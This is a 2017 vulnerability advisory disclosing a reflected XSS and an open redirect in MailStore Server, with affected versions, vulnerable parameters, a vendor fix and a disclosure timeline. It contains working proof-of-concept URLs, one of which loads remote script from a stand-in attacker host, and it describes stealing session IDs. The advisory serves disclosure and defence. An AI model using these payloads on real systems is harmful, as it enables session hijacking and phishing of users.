secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server

Affected Products
   MailStore Server Version 10.0.1.12148 was tested
   according to the vendor:
   - MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability
   - Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability

References
   https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
   CWE-79 https://cwe.mitre.org/data/definitions/79.html
   CWE-601 https://cwe.mitre.org/data/definitions/601.html

Summary:
   "MailStore Server is one of the world’s leading solutions for email archiving, 
   management and compliance for small and medium-sized businesses."

   The in-built Webapplication does not properly validate untrusted input in 
   several variables. This leads to both Reflected Cross-Site-Scripting (XSS) 
   and an Open Redirect.

Effect:
   To exploit the reflected XSS, the victim has to be authenticated to the 
   Mailstore Webapplication. By clicking on a link sent to a victim, an attacker 
   could for example copy the victims Session-ID to his on data sink.

   Sending another link with a crafted URL, the attacker could redirect the 
   victim to a malicious website, while the link itself points to the trusted 
   Mailstore-Address. The victim is not required to be authenticated.

Vulnerable Scripts Reflected XSS for authenticated users:
   /search-result/, Parameters c-f, c-q, c-from and c-to 
   /message/ajax/send/, Parameter recipient

Vulnerable Script Open Redirect:
   derefer/, Parameter url

Example for reflected XSS:
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
   #Load external JS-Code
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E

Example for Open Redirect:
   https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de

Solution:
   Update to Version 10.0.2

Disclosure Timeline:
   2017/01/09 vendor contacted
   2017/01/10 initial vendor response asking for technical details
   2017/01/10 provided vendor with the advisory including technical details
   2017/01/13 vendor provided informations about affected versions and mitigation
   2017/01/18 update published by vendor
   2017/01/31 public disclosure
   
Credits:
   Tobias Glemser
   tglemser@secuvera.de
   secuvera GmbH
   https://www.secuvera.de

Disclaimer:
   All information is provided without warranty. The intent is to
   provide information to secure infrastructure and/or systems, not
   to be able to attack or damage. Therefore secuvera shall
   not be liable for any direct or indirect damages that might be
   caused by using this information.